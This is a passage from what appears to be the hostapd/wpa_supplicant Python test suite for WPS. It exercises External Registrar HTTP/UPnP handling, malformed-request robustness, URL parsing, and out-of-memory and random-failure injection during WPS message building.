"eloop_sock_table_add_sock;?eloop_register_sock;httpread_create",
"httpread_hdr_analyze" ]:
with alloc_fail(dev[0], 1, func):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.connect(addr)
sock.send(b"GET / HTTP/1.1\r\n\r\n")
try:
sock.recv(100)
except:
pass
sock.close()
logger.info("Invalid HTTP header")
for req in [ " GET / HTTP/1.1\r\n\r\n",
"HTTP/1.1 200 OK\r\n\r\n",
"HTTP/\r\n\r\n",
"GET %%a%aa% HTTP/1.1\r\n\r\n",
"GET / HTTP/1.1\r\n FOO\r\n\r\n",
"NOTIFY / HTTP/1.1\r\n" + 4097*'a' + '\r\n\r\n',
"NOTIFY / HTTP/1.1\r\n\r\n" + 8193*'a',
"POST / HTTP/1.1\r\nTransfer-Encoding: CHUNKED\r\n\r\n foo\r\n",
"POST / HTTP/1.1\r\nTransfer-Encoding: CHUNKED\r\n\r\n1\r\nfoo\r\n",
"POST / HTTP/1.1\r\nTransfer-Encoding: CHUNKED\r\n\r\n0\r\n",
"POST / HTTP/1.1\r\nTransfer-Encoding: CHUNKED\r\n\r\n0\r\naa\ra\r\n\ra" ]:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.settimeout(0.1)
sock.connect(addr)
sock.send(req.encode())
try:
sock.recv(100)
except:
pass
sock.close()
with alloc_fail(dev[0], 2, "httpread_read_handler"):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.connect(addr)
sock.send(b"NOTIFY / HTTP/1.1\r\n\r\n" + 4500 * b'a')
try:
sock.recv(100)
except:
pass
sock.close()
conn = HTTPConnection(url.netloc)
payload = '<foo'
headers = { "Content-type": 'text/xml; charset="utf-8"',
"Server": "Unspecified, UPnP/1.0, Unspecified",
"HOST": url.netloc,
"NT": "upnp:event",
"SID": "uuid:" + uuid,
"SEQ": "0",
"Content-Length": str(len(payload)) }
conn.request("NOTIFY", url.path, payload, headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn = HTTPConnection(url.netloc)
payload = '<WLANEvent foo></WLANEvent>'
headers = { "Content-type": 'text/xml; charset="utf-8"',
"Server": "Unspecified, UPnP/1.0, Unspecified",
"HOST": url.netloc,
"NT": "upnp:event",
"SID": "uuid:" + uuid,
"SEQ": "0",
"Content-Length": str(len(payload)) }
conn.request("NOTIFY", url.path, payload, headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(dev[0], 1, "xml_get_first_item"):
send_wlanevent(url, uuid, b'')
with alloc_fail(dev[0], 1, "wpabuf_alloc_ext_data;xml_get_base64_item"):
send_wlanevent(url, uuid, b'foo')
for func in [ "wps_init",
"wps_process_manufacturer",
"wps_process_model_name",
"wps_process_model_number",
"wps_process_serial_number",
"wps_process_dev_name" ]:
with alloc_fail(dev[0], 1, func):
send_wlanevent(url, uuid, m1)
with alloc_fail(dev[0], 1, "wps_er_http_resp_ok"):
send_wlanevent(url, uuid, m1, no_response=True)
with alloc_fail(dev[0], 1, "wps_er_http_resp_not_found"):
url2 = urlparse(wps_event_url.replace('/event/', '/notfound/'))
send_wlanevent(url2, uuid, m1, no_response=True)
logger.info("EAP message: M1")
data = b'\x0202:11:22:00:00:00'
data += b'\x10\x22\x00\x01\x04'
data += b'\x10\x47\x00\x10' + 16 * b'\x00'
data += b'\x10\x20\x00\x06\x02\x00\x00\x00\x00\x00'
data += b'\x10\x1a\x00\x10' + 16 * b'\x00'
data += b'\x10\x32\x00\xc0' + 192 * b'\x00'
data += b'\x10\x04\x00\x02\x00\x00'
data += b'\x10\x10\x00\x02\x00\x00'
data += b'\x10\x0d\x00\x01\x00'
data += b'\x10\x08\x00\x02\x00\x00'
data += b'\x10\x44\x00\x01\x00'
data += b'\x10\x21\x00\x00'
data += b'\x10\x23\x00\x00'
data += b'\x10\x24\x00\x00'
data += b'\x10\x42\x00\x00'
data += b'\x10\x54\x00\x08' + 8 * b'\x00'
data += b'\x10\x11\x00\x00'
data += b'\x10\x3c\x00\x01\x00'
data += b'\x10\x02\x00\x02\x00\x00'
data += b'\x10\x12\x00\x02\x00\x00'
data += b'\x10\x09\x00\x02\x00\x00'
data += b'\x10\x2d\x00\x04\x00\x00\x00\x00'
dev[0].dump_monitor()
with alloc_fail(dev[0], 1, "wps_er_add_sta_data"):
send_wlanevent(url, uuid, data)
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected enrollee add event")
send_wlanevent(url, uuid, data)
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=2)
if ev is None:
raise Exception("Enrollee add event not seen")
with alloc_fail(dev[0], 1,
"base64_gen_encode;?base64_encode;wps_er_soap_hdr"):
send_wlanevent(url, uuid, data)
with alloc_fail(dev[0], 1, "wpabuf_alloc;wps_er_soap_hdr"):
send_wlanevent(url, uuid, data)
with alloc_fail(dev[0], 1, "http_client_url_parse;wps_er_sta_send_msg"):
send_wlanevent(url, uuid, data)
with alloc_fail(dev[0], 1, "http_client_addr;wps_er_sta_send_msg"):
send_wlanevent(url, uuid, data)
def test_ap_wps_er_http_proto_no_event_sub_url(dev, apdev):
"""WPS ER HTTP protocol testing - no eventSubURL"""
class WPSAPHTTPServer_no_event_sub_url(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(eventSubURL=None))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_event_sub_url,
no_event_url=True)
def test_ap_wps_er_http_proto_event_sub_url_dns(dev, apdev):
"""WPS ER HTTP protocol testing - DNS name in eventSubURL"""
class WPSAPHTTPServer_event_sub_url_dns(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(eventSubURL='http://example.com/wps_event'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_event_sub_url_dns,
no_event_url=True)
def test_ap_wps_er_http_proto_subscribe_oom(dev, apdev):
"""WPS ER HTTP protocol testing - subscribe OOM"""
try:
_test_ap_wps_er_http_proto_subscribe_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_http_proto_subscribe_oom(dev, apdev):
tests = [ (1, "http_client_url_parse"),
(1, "wpabuf_alloc;wps_er_subscribe"),
(1, "http_client_addr"),
(1, "eloop_sock_table_add_sock;?eloop_register_sock;http_client_addr"),
(1, "eloop_register_timeout;http_client_addr") ]
for count,func in tests:
with alloc_fail(dev[0], count, func):
server,sock = wps_er_start(dev[0], WPSAPHTTPServer)
server.handle_request()
server.handle_request()
wps_er_stop(dev[0], sock, server, on_alloc_fail=True)
def test_ap_wps_er_http_proto_no_sid(dev, apdev):
"""WPS ER HTTP protocol testing - no SID"""
class WPSAPHTTPServer_no_sid(WPSAPHTTPServer):
def handle_wps_event(self):
self.wfile.write(gen_wps_event(sid=None))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_sid)
def test_ap_wps_er_http_proto_invalid_sid_no_uuid(dev, apdev):
"""WPS ER HTTP protocol testing - invalid SID - no UUID"""
class WPSAPHTTPServer_invalid_sid_no_uuid(WPSAPHTTPServer):
def handle_wps_event(self):
self.wfile.write(gen_wps_event(sid='FOO'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_invalid_sid_no_uuid)
def test_ap_wps_er_http_proto_invalid_sid_uuid(dev, apdev):
"""WPS ER HTTP protocol testing - invalid SID UUID"""
class WPSAPHTTPServer_invalid_sid_uuid(WPSAPHTTPServer):
def handle_wps_event(self):
self.wfile.write(gen_wps_event(sid='uuid:FOO'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_invalid_sid_uuid)
def test_ap_wps_er_http_proto_subscribe_failing(dev, apdev):
"""WPS ER HTTP protocol testing - SUBSCRIBE failing"""
class WPSAPHTTPServer_fail_subscribe(WPSAPHTTPServer):
def handle_wps_event(self):
payload = ""
hdr = 'HTTP/1.1 404 Not Found\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Timeout: Second-1801\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
self.wfile.write((hdr + payload).encode())
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_fail_subscribe)
def test_ap_wps_er_http_proto_subscribe_invalid_response(dev, apdev):
"""WPS ER HTTP protocol testing - SUBSCRIBE and invalid response"""
class WPSAPHTTPServer_subscribe_invalid_response(WPSAPHTTPServer):
def handle_wps_event(self):
payload = ""
hdr = 'HTTP/1.1 FOO\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Timeout: Second-1801\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
self.wfile.write((hdr + payload).encode())
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_subscribe_invalid_response)
def test_ap_wps_er_http_proto_subscribe_invalid_response(dev, apdev):
"""WPS ER HTTP protocol testing - SUBSCRIBE and invalid response"""
class WPSAPHTTPServer_invalid_m1(WPSAPHTTPServer):
def handle_wps_control(self):
payload = '''<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetDeviceInfoResponse xmlns:u="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewDeviceInfo>Rk9P</NewDeviceInfo>
</u:GetDeviceInfoResponse>
</s:Body>
</s:Envelope>
'''
self.wfile.write(gen_wps_control(payload_override=payload))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_invalid_m1, no_event_url=True)
def test_ap_wps_er_http_proto_upnp_info_no_device(dev, apdev):
"""WPS ER HTTP protocol testing - No device in UPnP info"""
class WPSAPHTTPServer_no_device(WPSAPHTTPServer):
def handle_upnp_info(self):
payload = '''<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
</root>
'''
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
self.wfile.write((hdr + payload).encode())
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_device, no_event_url=True)
def test_ap_wps_er_http_proto_upnp_info_no_device_type(dev, apdev):
"""WPS ER HTTP protocol testing - No deviceType in UPnP info"""
class WPSAPHTTPServer_no_device(WPSAPHTTPServer):
def handle_upnp_info(self):
payload = '''<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
</device>
</root>
'''
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
self.wfile.write((hdr + payload).encode())
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_device, no_event_url=True)
def test_ap_wps_er_http_proto_upnp_info_invalid_udn_uuid(dev, apdev):
"""WPS ER HTTP protocol testing - Invalid UDN UUID"""
class WPSAPHTTPServer_invalid_udn_uuid(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(udn='uuid:foo'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_invalid_udn_uuid)
def test_ap_wps_er_http_proto_no_control_url(dev, apdev):
"""WPS ER HTTP protocol testing - no controlURL"""
class WPSAPHTTPServer_no_control_url(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(controlURL=None))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_control_url,
no_event_url=True)
def test_ap_wps_er_http_proto_control_url_dns(dev, apdev):
"""WPS ER HTTP protocol testing - DNS name in controlURL"""
class WPSAPHTTPServer_control_url_dns(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(controlURL='http://example.com/wps_control'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_control_url_dns,
no_event_url=True)
def test_ap_wps_http_timeout(dev, apdev):
"""WPS AP/ER and HTTP timeout"""
try:
_test_ap_wps_http_timeout(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_http_timeout(dev, apdev):
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
url = urlparse(location)
addr = (url.hostname, url.port)
logger.debug("Open HTTP connection to hostapd, but do not complete request")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.connect(addr)
sock.send(b"G")
class DummyServer(StreamRequestHandler):
def handle(self):
logger.debug("DummyServer - start 31 sec wait")
time.sleep(31)
logger.debug("DummyServer - wait done")
logger.debug("Start WPS ER")
server,sock2 = wps_er_start(dev[0], DummyServer, max_age=40,
wait_m_search=True)
logger.debug("Start server to accept, but not complete, HTTP connection from WPS ER")
# This will wait for 31 seconds..
server.handle_request()
logger.debug("Complete HTTP connection with hostapd (that should have already closed the connection)")
try:
sock.send("ET / HTTP/1.1\r\n\r\n")
res = sock.recv(100)
sock.close()
except:
pass
def test_ap_wps_er_url_parse(dev, apdev):
"""WPS ER and URL parsing special cases"""
try:
_test_ap_wps_er_url_parse(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_url_parse(dev, apdev):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.settimeout(1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("239.255.255.250", 1900))
dev[0].request("WPS_ER_START ifname=lo")
(msg,addr) = sock.recvfrom(1000)
msg = msg.decode()
logger.debug("Received SSDP message from %s: %s" % (str(addr), msg))
if "M-SEARCH" not in msg:
raise Exception("Not an M-SEARCH")
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://127.0.0.1\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=2)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://127.0.0.1/:foo\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=2)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://255.255.255.255:0/foo.xml\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=2)
sock.close()
def test_ap_wps_er_link_update(dev, apdev):
"""WPS ER and link update special cases"""
class WPSAPHTTPServer_link_update(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(controlURL='/wps_control'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_link_update)
class WPSAPHTTPServer_link_update2(WPSAPHTTPServer):
def handle_others(self, data):
if "GET / " in data:
self.wfile.write(gen_upnp_info(controlURL='/wps_control'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_link_update2,
location_url='http://127.0.0.1:12345')
def test_ap_wps_er_http_client(dev, apdev):
"""WPS ER and HTTP client special cases"""
with alloc_fail(dev[0], 1, "http_link_update"):
run_wps_er_proto_test(dev[0], WPSAPHTTPServer)
with alloc_fail(dev[0], 1, "wpabuf_alloc;http_client_url"):
run_wps_er_proto_test(dev[0], WPSAPHTTPServer, no_event_url=True)
with alloc_fail(dev[0], 1, "httpread_create;http_client_tx_ready"):
run_wps_er_proto_test(dev[0], WPSAPHTTPServer, no_event_url=True)
class WPSAPHTTPServer_req_as_resp(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(b"GET / HTTP/1.1\r\n\r\n")
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_req_as_resp,
no_event_url=True)
def test_ap_wps_init_oom(dev, apdev):
"""wps_init OOM cases"""
ssid = "test-wps"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"ap_pin": appin }
hapd = hostapd.add_ap(apdev[0], params)
pin = dev[0].wps_read_pin()
with alloc_fail(hapd, 1, "wps_init"):
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
with alloc_fail(dev[0], 2, "wps_init"):
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
with alloc_fail(dev[0], 2, "wps_init"):
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PBC %s" % (apdev[0]['bssid']))
ev = hapd.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
dev[0].dump_monitor()
new_ssid = "wps-new-ssid"
new_passphrase = "1234567890"
with alloc_fail(dev[0], 3, "wps_init"):
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPA2PSK", "CCMP",
new_passphrase, no_wait=True)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_invalid_assoc_req_elem(dev, apdev):
"""WPS and invalid IE in Association Request frame"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
pin = "12345670"
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
try:
dev[0].request("VENDOR_ELEM_ADD 13 dd050050f20410")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
for i in range(5):
ev = hapd.wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=10)
if ev and "vendor=14122" in ev:
break
if ev is None or "vendor=14122" not in ev:
raise Exception("EAP-WSC not started")
dev[0].request("WPS_CANCEL")
finally:
dev[0].request("VENDOR_ELEM_REMOVE 13 *")
def test_ap_wps_pbc_pin_mismatch(dev, apdev):
"""WPS PBC/PIN mismatch"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
hapd.request("SET wps_version_number 0x10")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
hapd.request("WPS_PBC")
pin = dev[0].wps_read_pin()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"])
if ev is None:
raise Exception("Scan did not complete")
dev[0].request("WPS_CANCEL")
hapd.request("WPS_CANCEL")
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_ie_invalid(dev, apdev):
"""WPS PIN attempt with AP that has invalid WSC IE"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"vendor_elements": "dd050050f20410" }
hapd = hostapd.add_ap(apdev[0], params)
params = { 'ssid': "another", "vendor_elements": "dd050050f20410" }
hostapd.add_ap(apdev[1], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
pin = dev[0].wps_read_pin()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"])
if ev is None:
raise Exception("Scan did not complete")
dev[0].request("WPS_CANCEL")
@remote_compatible
def test_ap_wps_scan_prio_order(dev, apdev):
"""WPS scan priority ordering"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
params = { 'ssid': "another", "vendor_elements": "dd050050f20410" }
hostapd.add_ap(apdev[1], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
pin = dev[0].wps_read_pin()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"])
if ev is None:
raise Exception("Scan did not complete")
dev[0].request("WPS_CANCEL")
def test_ap_wps_probe_req_ie_oom(dev, apdev):
"""WPS ProbeReq IE OOM"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with alloc_fail(dev[0], 1, "wps_build_probe_req_ie"):
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["AP-STA-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Association not seen")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "wps_ie_encapsulate"):
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["AP-STA-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Association not seen")
dev[0].request("WPS_CANCEL")
hapd.disable()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
time.sleep(0.2)
dev[0].flush_scan_cache()
def test_ap_wps_assoc_req_ie_oom(dev, apdev):
"""WPS AssocReq IE OOM"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with alloc_fail(dev[0], 1, "wps_build_assoc_req_ie"):
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["AP-STA-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Association not seen")
dev[0].request("WPS_CANCEL")
def test_ap_wps_assoc_resp_ie_oom(dev, apdev):
"""WPS AssocResp IE OOM"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with alloc_fail(hapd, 1, "wps_build_assoc_resp_ie"):
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["AP-STA-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Association not seen")
dev[0].request("WPS_CANCEL")
@remote_compatible
def test_ap_wps_bss_info_errors(dev, apdev):
"""WPS BSS info errors"""
params = { "ssid": "1",
"vendor_elements": "dd0e0050f20410440001ff101100010a" }
hostapd.add_ap(apdev[0], params)
params = { 'ssid': "2", "vendor_elements": "dd050050f20410" }
hostapd.add_ap(apdev[1], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
logger.info("BSS: " + str(bss))
if "wps_state" in bss:
raise Exception("Unexpected wps_state in BSS info")
if 'wps_device_name' not in bss:
raise Exception("No wps_device_name in BSS info")
if bss['wps_device_name'] != '_':
raise Exception("Unexpected wps_device_name value")
bss = dev[0].get_bss(apdev[1]['bssid'])
logger.info("BSS: " + str(bss))
with alloc_fail(dev[0], 1, "=wps_attr_text"):
bss = dev[0].get_bss(apdev[0]['bssid'])
logger.info("BSS(OOM): " + str(bss))
def wps_run_pbc_fail_ap(apdev, dev, hapd):
hapd.request("WPS_PBC")
dev.scan_for_bss(apdev['bssid'], freq="2412")
dev.request("WPS_PBC " + apdev['bssid'])
ev = dev.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev.request("WPS_CANCEL")
dev.wait_disconnected()
for i in range(5):
try:
dev.flush_scan_cache()
break
except Exception as e:
if str(e).startswith("Failed to trigger scan"):
# Try again
time.sleep(1)
else:
raise
def wps_run_pbc_fail(apdev, dev):
hapd = wps_start_ap(apdev)
wps_run_pbc_fail_ap(apdev, dev, hapd)
@remote_compatible
def test_ap_wps_pk_oom(dev, apdev):
"""WPS and public key OOM"""
with alloc_fail(dev[0], 1, "wps_build_public_key"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_pk_oom_ap(dev, apdev):
"""WPS and public key OOM on AP"""
hapd = wps_start_ap(apdev[0])
with alloc_fail(hapd, 1, "wps_build_public_key"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
@remote_compatible
def test_ap_wps_encr_oom_ap(dev, apdev):
"""WPS and encrypted settings decryption OOM on AP"""
hapd = wps_start_ap(apdev[0])
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with alloc_fail(hapd, 1, "wps_decrypt_encr_settings"):
dev[0].request("WPS_PIN " + apdev[0]['bssid'] + " " + pin)
ev = hapd.wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("No WPS-FAIL reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
@remote_compatible
def test_ap_wps_encr_no_random_ap(dev, apdev):
"""WPS and no random data available for encryption on AP"""
hapd = wps_start_ap(apdev[0])
with fail_test(hapd, 1, "os_get_random;wps_build_encr_settings"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
@remote_compatible
def test_ap_wps_e_hash_no_random_sta(dev, apdev):
"""WPS and no random data available for e-hash on STA"""
with fail_test(dev[0], 1, "os_get_random;wps_build_e_hash"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m1_no_random(dev, apdev):
"""WPS and no random for M1 on STA"""
with fail_test(dev[0], 1, "os_get_random;wps_build_m1"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m1_oom(dev, apdev):
"""WPS and OOM for M1 on STA"""
with alloc_fail(dev[0], 1, "wps_build_m1"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m3_oom(dev, apdev):
"""WPS and OOM for M3 on STA"""
with alloc_fail(dev[0], 1, "wps_build_m3"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m5_oom(dev, apdev):
"""WPS and OOM for M5 on STA"""
hapd = wps_start_ap(apdev[0])
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
for i in range(1, 3):
with alloc_fail(dev[0], i, "wps_build_m5"):
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_m5_no_random(dev, apdev):
"""WPS and no random for M5 on STA"""
with fail_test(dev[0], 1,
"os_get_random;wps_build_encr_settings;wps_build_m5"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m7_oom(dev, apdev):
"""WPS and OOM for M7 on STA"""
hapd = wps_start_ap(apdev[0])
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
for i in range(1, 3):
with alloc_fail(dev[0], i, "wps_build_m7"):
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_m7_no_random(dev, apdev):
"""WPS and no random for M7 on STA"""
with fail_test(dev[0], 1,
"os_get_random;wps_build_encr_settings;wps_build_m7"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_wsc_done_oom(dev, apdev):
"""WPS and OOM for WSC_Done on STA"""
with alloc_fail(dev[0], 1, "wps_build_wsc_done"):
wps_run_pbc_fail(apdev[0], dev[0])
def test_ap_wps_random_psk_fail(dev, apdev):
"""WPS and no random for PSK on AP"""
ssid = "test-wps"
pskfile = "/tmp/ap_wps_per_enrollee_psk.psk_file"
appin = "12345670"
try:
